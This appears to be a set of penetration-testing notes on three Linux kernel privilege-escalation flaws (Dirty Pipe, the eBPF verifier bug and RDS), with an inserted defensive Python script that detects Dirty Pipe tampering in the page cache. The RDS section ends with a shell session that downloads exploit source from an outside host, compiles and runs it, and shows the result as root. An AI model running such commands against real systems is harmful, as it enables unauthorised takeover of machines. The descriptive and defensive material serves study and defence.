Kernel

Dirty Pipe

Dirty Pipe (CVE-2022-0847) is a Linux kernel vulnerability that allows unprivileged local users to escalate privileges by exploiting uninitialized pipe_buffer flags. Because copy_page_to_iter_pipe() and push_pipe() did not initialize the flags of the pipe_buffer entries they created, stale flag values could grant unintended write access to pages in the page cache, even when those pages back read-only files.

By writing into these cached pages, the contents of sensitive files (e.g., /etc/passwd) can be overwritten in memory without touching the on-disk filesystem. This enables silent privilege escalation and arbitrary code injection that most file integrity controls do not detect.
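As an added example (not part of the original page), the following Python script implements the check a defender would want against a page-cache-only overwrite: it reads a file once normally, which is served from the page cache, and once with O_DIRECT, which bypasses the cache and is served from disk, then reports where the two views differ. It assumes Linux, Python 3.7+ (os.preadv) and a filesystem that honours O_DIRECT (ext4/xfs do, tmpfs does not); all function names are mine.

```python
# Compare the page-cache view of a file (buffered read) with the on-disk view
# (O_DIRECT read). A Dirty Pipe-style overwrite lives only in the page cache
# and is never written back, so the two views diverge until the page is evicted.
# Assumptions: Linux, Python 3.7+, filesystem that honours O_DIRECT.
import mmap
import os
import sys

PAGE = mmap.PAGESIZE


def find_divergence(cached: bytes, ondisk: bytes) -> list:
    """Return (offset, length) runs where the two views differ.
    A length mismatch is reported as one final run."""
    runs, start = [], None
    n = min(len(cached), len(ondisk))
    for i in range(n):
        if cached[i] != ondisk[i]:
            if start is None:
                start = i
        elif start is not None:
            runs.append((start, i - start))
            start = None
    if start is not None:
        runs.append((start, n - start))
    if len(cached) != len(ondisk):
        runs.append((n, abs(len(cached) - len(ondisk))))
    return runs


def read_direct(path: str) -> bytes:
    """Read the whole file with O_DIRECT; buffer and length must be aligned."""
    size = os.stat(path).st_size
    nbytes = max(PAGE, -(-size // PAGE) * PAGE)   # round up to a page multiple
    buf = mmap.mmap(-1, nbytes)                   # anonymous mmap is page-aligned
    fd = os.open(path, os.O_RDONLY | os.O_DIRECT)
    try:
        got = os.preadv(fd, [buf], 0)
    finally:
        os.close(fd)
    return bytes(buf[:min(got, size)])


def check_file(path: str) -> list:
    """Empty list means page cache and disk agree for this file."""
    with open(path, "rb") as f:
        cached = f.read()
    return find_divergence(cached, read_direct(path))


if __name__ == "__main__":
    for p in sys.argv[1:] or ["/etc/passwd"]:
        try:
            runs = check_file(p)
        except OSError as e:   # e.g. EINVAL when the filesystem lacks O_DIRECT
            print(f"{p}: cannot compare ({e.strerror})")
            continue
        print(f"{p}: {'CLEAN' if not runs else 'cache differs from disk at ' + str(runs)}")
```

Run the check before clearing caches: once the tampered page is evicted (for example after `sync; echo 3 > /proc/sys/vm/drop_caches` or a reboot) the original disk content is served again and the divergence disappears.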

eBPF_verifier

eBPF_verifier (CVE-2017-16995) is a privilege escalation (PE) vulnerability in the Linux kernel's eBPF (Extended Berkeley Packet Filter) verifier. The flaw lies in the verifier's insufficient validation of register states when processing certain BPF instructions. By crafting a malicious BPF program and loading it through a system call that unprivileged users were allowed to invoke, it becomes possible to perform out-of-bounds memory reads and writes in kernel space. This enables corruption of kernel memory structures and ultimately arbitrary code execution with elevated privileges.

RDS

The CVE-2010-3904 vulnerability affects the RDS (Reliable Datagram Sockets) implementation in the Linux kernel prior to version 2.6.36. The function rds_page_copy_user() fails to properly validate user-supplied memory addresses during sendmsg and recvmsg calls. As a result, a local attacker can write arbitrary data to kernel memory.

This flaw allows reliable privilege escalation by overwriting function pointers or other critical kernel structures. No special capabilities are required beyond local access and the ability to open an RDS socket. Because it directly manipulates kernel memory, exploitation is fast and effective, making it highly valuable for post-exploitation or lateral movement on older systems that remain unpatched.

$ wget http://192.168.45.170:443/linux-rds-exploit.c -O /tmp/linux-rds-exploit.c
$ gcc /tmp/linux-rds-exploit.c -o /tmp/rds
$ /tmp/rds
[*] Got root!
# id
uid=0(root) gid=0(root)
